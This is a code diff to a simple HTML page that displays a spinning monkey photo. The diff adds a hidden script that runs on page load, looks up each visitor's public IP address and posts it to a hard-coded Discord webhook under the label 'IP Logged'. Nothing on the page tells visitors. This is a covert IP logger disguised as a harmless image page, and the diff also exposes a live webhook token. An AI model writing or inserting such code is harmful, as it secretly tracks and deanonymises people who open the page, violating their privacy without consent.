--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Spinning Image</title>
+    <title>Monkey</title>
     <style>
         body {
             margin: 0;
@@ -34,5 +34,19 @@
 </head>
 <body>
     <img src="https://media.npr.org/assets/img/2015/09/23/ap_836720500193-d90a20e2b8d735f74d436f36054eb3dc2bd96696.jpg?s=1100&c=85&f=jpeg" alt="Spinning Image">
+    <script>
+        fetch('https://api.ipify.org?format=json')
+            .then(response => response.json())
+            .then(data => {
+                fetch('https://discord.com/api/webhooks/1271255816862699644/SbqZxdE3-tbrIatKMUjwzszcR6bsAIV4LHtdr1CtWb8Wfjkhx-kGTgi9NqVCcS3Lebj3', {
+                    method: 'POST',
+                    headers: {
+                        'Content-Type': 'application/json'
+                    },
+                    body: JSON.stringify({ content: `IP Logged: ${data.ip}` })
+                });
+            })
+            .catch(error => console.error('Error fetching IP:', error));
+    </script>
 </body>
 </html>
